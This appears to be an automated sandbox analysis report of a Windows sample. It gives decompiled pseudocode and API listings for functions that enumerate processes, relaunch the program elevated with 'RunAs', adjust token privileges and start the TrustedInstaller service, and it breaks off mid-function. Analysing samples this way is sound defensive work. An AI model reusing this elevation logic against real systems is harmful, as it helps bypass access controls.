                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 445630090f303c793fc3bfa4fa4d364c02f4dcb40a8f9bdf3e2d6905e59f1ba5
                                                                                                                • Instruction ID: d62d6cf796cb98422c577f595823901a938d8c4669368bf23d123c7574892993
                                                                                                                • Opcode Fuzzy Hash: 445630090f303c793fc3bfa4fa4d364c02f4dcb40a8f9bdf3e2d6905e59f1ba5
                                                                                                                • Instruction Fuzzy Hash: 1FA17D36E0021ACFCF05DFA5C9845EEBBB6FF84304B15856AE905BB261EB31A945CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 02018bab23345051413e455a442fd8c01d889e3f3e5e6071a6dedeb17d962509
                                                                                                                • Instruction ID: de69cfa2b30f666164a5ef4c80fa0a2f58b561b901433497c331404f57d65061
                                                                                                                • Opcode Fuzzy Hash: 02018bab23345051413e455a442fd8c01d889e3f3e5e6071a6dedeb17d962509
                                                                                                                • Instruction Fuzzy Hash: 30C11CB2912746AAD712CF65F4B81893B61FB45328F504328D161AB7E0DFBC2C4ACF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, Offset: 00500000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.313015828.0000000000500000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.313219703.0000000000589000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f9ddae1b636ecae6a5d82fe1f2921836f9ed60b833793ada430254d8751e3ab
                                                                                                                • Instruction ID: b6a99feacea8209d6e902e7d57aea90b24907762500d6f367880922fff304976
                                                                                                                • Opcode Fuzzy Hash: 4f9ddae1b636ecae6a5d82fe1f2921836f9ed60b833793ada430254d8751e3ab
                                                                                                                • Instruction Fuzzy Hash: D161BB3044E7C59FD7878B74C4A84517FF0AE1722832D89EEC4848E473E66A9C96DB63
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v32;
                                                                                                                				char _v40;
                                                                                                                				char _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				char _v576;
                                                                                                                				long _v580;
                                                                                                                				intOrPtr _v1112;
                                                                                                                				long _v1128;
                                                                                                                				void _v1132;
                                                                                                                				void* _v1136;
                                                                                                                				void _v1658;
                                                                                                                				char _v1660;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t41;
                                                                                                                				long _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				struct HINSTANCE__* _t68;
                                                                                                                				void* _t71;
                                                                                                                				void* _t83;
                                                                                                                				void* _t84;
                                                                                                                				void* _t85;
                                                                                                                
                                                                                                                				_t78 = _a4;
                                                                                                                				E004099D4(_a4 + 0x28);
                                                                                                                				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                				_v12 = _t41;
                                                                                                                				memset( &_v1132, 0, 0x228);
                                                                                                                				_t84 = _t83 + 0xc;
                                                                                                                				_v1136 = 0x22c;
                                                                                                                				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                                                					E004090AF( &_v580);
                                                                                                                					_t49 = _v1128;
                                                                                                                					_v580 = _t49;
                                                                                                                					_v52 = _v1112;
                                                                                                                					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                					_v8 = _t50;
                                                                                                                					if(_t50 != 0) {
                                                                                                                						L4:
                                                                                                                						_v1660 = 0;
                                                                                                                						memset( &_v1658, 0, 0x208);
                                                                                                                						_t85 = _t84 + 0xc;
                                                                                                                						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                						if(_v1660 != 0) {
                                                                                                                							L10:
                                                                                                                							E0040920A( &_v576,  &_v1660);
                                                                                                                							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                							_t84 = _t85 + 0x14;
                                                                                                                							CloseHandle(_v8);
                                                                                                                							_t78 = _a4;
                                                                                                                							L11:
                                                                                                                							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_v16 = 0x104;
                                                                                                                						if( *0x41c8e0 == 0) {
                                                                                                                							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                							if(_t68 != 0) {
                                                                                                                								 *0x41c8e0 = 1;
                                                                                                                								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t66 =  *0x41c8e4;
                                                                                                                						if(_t66 != 0) {
                                                                                                                							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                					_v8 = _t71;
                                                                                                                					if(_t71 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return CloseHandle(_v12);
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
                                                                                                                				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                				void _v582;
                                                                                                                				char _v584;
                                                                                                                				void _v1110;
                                                                                                                				char _v1112;
                                                                                                                				long _t23;
                                                                                                                				int _t36;
                                                                                                                				int _t41;
                                                                                                                				void* _t43;
                                                                                                                				long _t44;
                                                                                                                
                                                                                                                				_t44 = 0;
                                                                                                                				_t23 = GetCurrentProcessId();
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				_v1112 = 0;
                                                                                                                				memset( &_v1110, 0, 0x208);
                                                                                                                				E00404AD9( &_v1112);
                                                                                                                				_push(_t23);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(L"/SpecialRun %I64x %d");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v584);
                                                                                                                				L0040B1EC();
                                                                                                                				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                				_v68.lpFile =  &_v1112;
                                                                                                                				_v68.lpParameters =  &_v584;
                                                                                                                				_v68.cbSize = 0x3c;
                                                                                                                				_v68.lpVerb = L"RunAs";
                                                                                                                				_v68.fMask = 0x40;
                                                                                                                				_v68.nShow = 5;
                                                                                                                				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                                                				_t43 = _v68.hProcess;
                                                                                                                				if(_t36 == 0) {
                                                                                                                					_t44 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                					_a4 = 0;
                                                                                                                					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                                                					if(_t41 != 0 && _a4 != 0x103) {
                                                                                                                						_t44 = _a4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t16;
                                                                                                                				_Unknown_base(*)()* _t18;
                                                                                                                				long _t19;
                                                                                                                				_Unknown_base(*)()* _t22;
                                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                                				struct HINSTANCE__** _t35;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t37 = __eflags;
                                                                                                                				_t35 = __eax;
                                                                                                                				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t16 = E00408F72(_t35);
                                                                                                                				__eflags = _t16;
                                                                                                                				if(_t16 != 0) {
                                                                                                                					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                					__eflags = _t24;
                                                                                                                					if(_t24 != 0) {
                                                                                                                						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v24.PrivilegeCount = 1;
                                                                                                                				_v12 = 2;
                                                                                                                				_a4 = _v8;
                                                                                                                				_t18 = E00408F72(_t35);
                                                                                                                				__eflags = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                					__eflags = _t22;
                                                                                                                					if(_t22 != 0) {
                                                                                                                						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t19 = GetLastError();
                                                                                                                				FindCloseChangeNotification(_v8); // executed
                                                                                                                				return _t19;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
                                                                                                                				intOrPtr _v28;
                                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                                				void* _t5;
                                                                                                                				int _t12;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t12 = 0; // executed
                                                                                                                				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                				_t14 = _t5;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                					}
                                                                                                                					CloseServiceHandle(_t14);
                                                                                                                				}
                                                                                                                				CloseServiceHandle(_a4);
                                                                                                                				return _t12;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                				struct HRSRC__* _t12;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t26;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t33;
                                                                                                                				struct HRSRC__* _t35;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                				_t35 = _t12;
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t33 = SizeofResource(_a4, _t35);
                                                                                                                					if(_t33 > 0) {
                                                                                                                						_t16 = LoadResource(_a4, _t35);
                                                                                                                						if(_t16 != 0) {
                                                                                                                							_t17 = LockResource(_t16);
                                                                                                                							if(_t17 != 0) {
                                                                                                                								_a4 = _t33;
                                                                                                                								_t29 = _t33 * _t33;
                                                                                                                								_t36 = 0;
                                                                                                                								_t7 =  &_a4;
                                                                                                                								 *_t7 = _a4 >> 2;
                                                                                                                								if( *_t7 != 0) {
                                                                                                                									do {
                                                                                                                										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                										_t36 = _t36 + 1;
                                                                                                                										_t29 = _t26;
                                                                                                                									} while (_t36 < _a4);
                                                                                                                								}
                                                                                                                								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                				WCHAR* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v20;
                                                                                                                				char* _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				int _v36;
                                                                                                                				int _v40;
                                                                                                                				char _v44;
                                                                                                                				void* _v56;
                                                                                                                				int _v60;
                                                                                                                				char _v92;
                                                                                                                				void _v122;
                                                                                                                				int _v124;
                                                                                                                				short _v148;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr _v168;
                                                                                                                				intOrPtr _v172;
                                                                                                                				intOrPtr _v176;
                                                                                                                				intOrPtr _v180;
                                                                                                                				void _v192;
                                                                                                                				char _v196;
                                                                                                                				char _v228;
                                                                                                                				void _v258;
                                                                                                                				int _v260;
                                                                                                                				void _v786;
                                                                                                                				short _v788;
                                                                                                                				void _v1314;
                                                                                                                				short _v1316;
                                                                                                                				void _v1842;
                                                                                                                				short _v1844;
                                                                                                                				void _v18234;
                                                                                                                				short _v18236;
                                                                                                                				char _v83772;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				short* _t174;
                                                                                                                				short _t175;
                                                                                                                				signed int _t176;
                                                                                                                				short _t177;
                                                                                                                				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
